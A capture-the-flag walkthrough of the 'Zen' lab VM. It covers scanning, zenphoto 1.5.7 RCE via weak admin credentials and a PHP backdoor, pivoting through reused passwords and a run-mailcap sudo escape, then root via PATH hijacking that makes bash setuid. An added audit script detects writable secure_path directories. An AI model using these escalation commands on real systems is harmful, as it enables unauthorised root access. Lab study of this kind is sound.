53. Zen

1. Basic information

2. Information gathering

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 192.168.56.113:22
Open 192.168.56.113:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-21 23:00 EDT
Initiating ARP Ping Scan at 23:00
Scanning 192.168.56.113 [1 port]
Completed ARP Ping Scan at 23:00, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:00
Completed Parallel DNS resolution of 1 host. at 23:00, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 23:00
Scanning 192.168.56.113 [2 ports]
Discovered open port 80/tcp on 192.168.56.113
Discovered open port 22/tcp on 192.168.56.113
Completed SYN Stealth Scan at 23:00, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.56.113
Host is up, received arp-response (0.00025s latency).
Scanned at 2025-05-21 23:00:14 EDT for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:4D:98:8E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.56.113/  -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /root/reports/http_192.168.56.113/__25-05-21_23-00-53.txt

Target: http://192.168.56.113/

[23:00:53] Starting: 
[23:00:54] 200 -  599B  - /.gitattributes
[23:00:54] 200 -  836B  - /.gitignore
[23:00:54] 200 -  615B  - /.htaccess
[23:01:00] 301 -  185B  - /albums  ->  http://192.168.56.113/albums/
[23:01:01] 301 -  185B  - /cache  ->  http://192.168.56.113/cache/
[23:01:01] 301 -  185B  - /cache_html  ->  http://192.168.56.113/cache_html/
[23:01:02] 200 -  696B  - /contributing.md
[23:01:04] 200 -    1KB - /favicon.ico
[23:01:07] 200 -   18KB - /LICENSE
[23:01:10] 301 -  185B  - /plugins  ->  http://192.168.56.113/plugins/
[23:01:11] 200 -    1KB - /README.md
[23:01:11] 200 -  431B  - /robots.txt
[23:01:14] 301 -  185B  - /themes  ->  http://192.168.56.113/themes/
┌──(root㉿kali)-[~]
└─# curl http://192.168.56.113/ |grep version
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4261    0  4261    0     0   425k      0 --:--:-- --:--:-- --:--:--  462k
<!-- zenphoto version 1.5.7 -->

2.1. zenphoto version 1.5.7 RCE

Log in with the weak credentials first

admin
P@ssw0rd

Then enable this plugin (screenshot)
Upload a PHP backdoor (screenshot)
http://192.168.56.113/themes/a.php (screenshot)

3. www-data -> user

Grab the database credentials from the web root

$conf['mysql_user'] = "test";
$conf['mysql_pass'] = "teste";
$conf['mysql_host'] = "localhost";
$conf['mysql_database'] = "zen";

But there is nothing useful in the database

(remote) www-data@zen:/var/www/html/zenphoto/zp-data$ ls -Rla /home
/home:
total 20
drwxr-xr-x  5 root      root      4096 Jun 14  2021 .
drwxr-xr-x 18 root      root      4096 Jun 14  2021 ..
drwxr-xr-x  2 hua       hua       4096 Jun 14  2021 hua
drwxr-xr-x  2 kodo      kodo      4096 Jun 14  2021 kodo
drwxr-xr-x  3 zenmaster zenmaster 4096 Jun 14  2021 zenmaster

/home/hua:
total 20
drwxr-xr-x 2 hua  hua  4096 Jun 14  2021 .
drwxr-xr-x 5 root root 4096 Jun 14  2021 ..
-rw-r--r-- 1 hua  hua   220 Jun 14  2021 .bash_logout
-rw-r--r-- 1 hua  hua  3526 Jun 14  2021 .bashrc
-rw-r--r-- 1 hua  hua   807 Jun 14  2021 .profile

/home/kodo:
total 24
drwxr-xr-x 2 kodo kodo 4096 Jun 14  2021 .
drwxr-xr-x 5 root root 4096 Jun 14  2021 ..
-rw------- 1 kodo kodo   49 Jun 14  2021 .Xauthority
-rw-r--r-- 1 kodo kodo  220 Jun 14  2021 .bash_logout
-rw-r--r-- 1 kodo kodo 3526 Jun 14  2021 .bashrc
-rw-r--r-- 1 kodo kodo  807 Jun 14  2021 .profile

/home/zenmaster:
total 28
drwxr-xr-x 3 zenmaster zenmaster 4096 Jun 14  2021 .
drwxr-xr-x 5 root      root      4096 Jun 14  2021 ..
-rw-r--r-- 1 zenmaster zenmaster  220 Jun 14  2021 .bash_logout
-rw-r--r-- 1 zenmaster zenmaster 3526 Jun 14  2021 .bashrc
drwxr-xr-x 3 zenmaster zenmaster 4096 Jun 14  2021 .local
-rw-r--r-- 1 zenmaster zenmaster  807 Jun 14  2021 .profile
-rw------- 1 zenmaster zenmaster    9 Jun 14  2021 user.txt

/home/zenmaster/.local:
total 12
drwxr-xr-x 3 zenmaster zenmaster 4096 Jun 14  2021 .
drwxr-xr-x 3 zenmaster zenmaster 4096 Jun 14  2021 ..
drwx------ 3 zenmaster zenmaster 4096 Jun 14  2021 share
ls: cannot open directory '/home/zenmaster/.local/share': Permission denied

We can see the user flag sits under the zenmaster user, so that is where to go next

Searched around a lot afterwards but found nothing useful

3.1. SSH weak passwords

Tried a few weak passwords and found the password is simply the username

hua  kodo  zenmaster
(remote) www-data@zen:/var/www/html/zenphoto/zp-data$ su zenmaster 
Password: zenmaste 
zenmaster@zen:/var/www/html/zenphoto/zp-data$ 
zenmaster@zen:/var/www/html/zenphoto/zp-data$ sudo -l
Matching Defaults entries for zenmaster on zen:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zenmaster may run the following commands on zen:
    (kodo) NOPASSWD: /bin/bash

4. Privilege escalation to hua

kodo@zen:~$ sudo -l
Matching Defaults entries for kodo on zen:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kodo may run the following commands on zen:
    (hua) NOPASSWD: /usr/bin/see

see is just run-mailcap

hua@zen:/home$ ls -la /usr/bin/see 
lrwxrwxrwx 1 root root 11 Feb  9  2019 /usr/bin/see -> run-mailcap

sudo -u hua /usr/bin/see /etc/passwd
!/bin/bash

5. Privilege escalation to root

hua@zen:/home$ sudo -l
Matching Defaults entries for hua on zen:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User hua may run the following commands on zen:
    (ALL : ALL) NOPASSWD: /usr/sbin/add-shell zen
hua@zen:/home$ cat /usr/sbin/add-shell
#!/bin/sh -e

if test $# -eq 0
then
        echo usage: $0 shellname [shellname ...]
        exit 1
fi

file=/etc/shells
# I want this to be GUARANTEED to be on the same filesystem as $file
tmpfile=${file}.tmp

set -o noclobber

trap "rm -f $tmpfile" EXIT

if ! awk '{print}' $file > $tmpfile
then
        cat 1>&2 <<EOF
Either another instance of $0 is running, or it was previously interrupted.
Please examine ${tmpfile} to see if it should be moved onto ${file}.
EOF
        exit 1
fi

for i
do
        REALDIR="$(dirname $(realpath -m $i))/$(basename $i)"
        for j in "$i" "$REALDIR"
        do
                if ! grep -q "^${j}$" $tmpfile
                then
                        echo $j >> $tmpfile
                fi
        done
done

chmod --reference=$file $tmpfile
chown --reference=$file $tmpfile

mv $tmpfile $file

trap "" EXIT
exit 0

5.1. Privilege escalation via environment-variable (PATH) hijacking

The sh script above uses a lot of system commands, and we can hijack these, for example set

First look at the precedence order of this environment variable

hua@zen:/home$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Then check where the current system command sits in that order

hua@zen:/home$ which grep
/usr/bin/grep

It is in /usr/bin/, so we just need to plant the hijack in any one of /usr/local/sbin, /usr/local/bin or /usr/sbin

hua@zen:/home$ ls -la /usr/local/bin
total 8
drwxr-xrwx  2 root root 4096 Jun 14  2021 .
drwxr-xr-x 10 root root 4096 Jun 14  2021 ..

/usr/local/bin turns out to be writable, so we hijack directly in that directory

hua@zen:/home$ echo 'chmod +s /bin/bash' >/usr/local/bin/grep
hua@zen:/home$ sudo -l
Matching Defaults entries for hua on zen:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User hua may run the following commands on zen:
    (ALL : ALL) NOPASSWD: /usr/sbin/add-shell zen
hua@zen:/home$ chmod +x /usr/local/bin/grep
hua@zen:/home$ su /usr/sbin/add-shell zen
su: user /usr/sbin/add-shell does not exist
hua@zen:/home$ sudo /usr/sbin/add-shell zen
hua@zen:/home$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
hua@zen:/home$ bash -p 
bash-5.0# whoami
root
bash-5.0# cat /root/root.txt 
hmvenlightenment
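The weakness exploited above is a writable directory early in sudo's secure_path combined with a script that calls commands by bare name. The audit script below is an added example, not from the writeup or the box, that flags exactly that condition; it assumes GNU or busybox `stat -c` and builds a constructed temporary tree (world-writable `local/bin` ahead of `usr/bin`) to demonstrate itself.

```shell
#!/bin/sh
# Added audit helper (not from the writeup): list writable dirs in a sudo
# secure_path and the external commands a sudo-allowed script would resolve
# from a directory listed after one of them. Assumes GNU/busybox stat -c.

# Print each existing dir in the colon-separated list $1 whose mode gives
# write access to group or others (a 2-bit in the last two octal digits).
writable_path_dirs() {
    for d in $(printf '%s' "$1" | tr ':' ' '); do
        if [ -d "$d" ]; then
            case "$(stat -c '%a' "$d")" in
                *[2367]|*[2367]?) echo "$d" ;;
            esac
        fi
    done
    return 0
}
# Usage: shadowed_commands SECURE_PATH cmd...  Prints "cmd binary writable-dir"
# for each cmd whose binary sits at or after the first writable dir. Shell
# builtins (set, trap, test) never hit the PATH lookup, so they are not listed.
shadowed_commands() {
    sp=$1; shift
    for cmd in "$@"; do
        hijack=''; resolved=''
        for d in $(printf '%s' "$sp" | tr ':' ' '); do
            [ -n "$hijack" ] || hijack=$(writable_path_dirs "$d")
            if [ -x "$d/$cmd" ]; then resolved="$d/$cmd"; break; fi
        done
        if [ -n "$resolved" ] && [ -n "$hijack" ]; then
            echo "$cmd $resolved $hijack"
        fi
    done
    return 0
}
# Constructed self-test mirroring the box: a world-writable local/bin (mode
# 0757, drwxr-xrwx) listed before the usr/bin that really holds the tools.
demo_report() {
    root=$(mktemp -d)
    mkdir -p "$root/local/bin" "$root/usr/bin"
    chmod 757 "$root/local/bin"; chmod 755 "$root/usr/bin"
    for c in grep awk mv; do
        printf '#!/bin/sh\nexit 0\n' > "$root/usr/bin/$c"; chmod 755 "$root/usr/bin/$c"
    done
    sp="$root/local/sbin:$root/local/bin:$root/usr/sbin:$root/usr/bin"
    shadowed_commands "$sp" grep awk mv realpath | sed "s#$root#<root>#g"
    rm -rf "$root"
}

demo_report
```

On a real host, feed it the secure_path from `sudo -l` and the external commands the allowed script calls; any line it prints is a directory whose permissions need fixing (here, `/usr/local/bin` back to 0755).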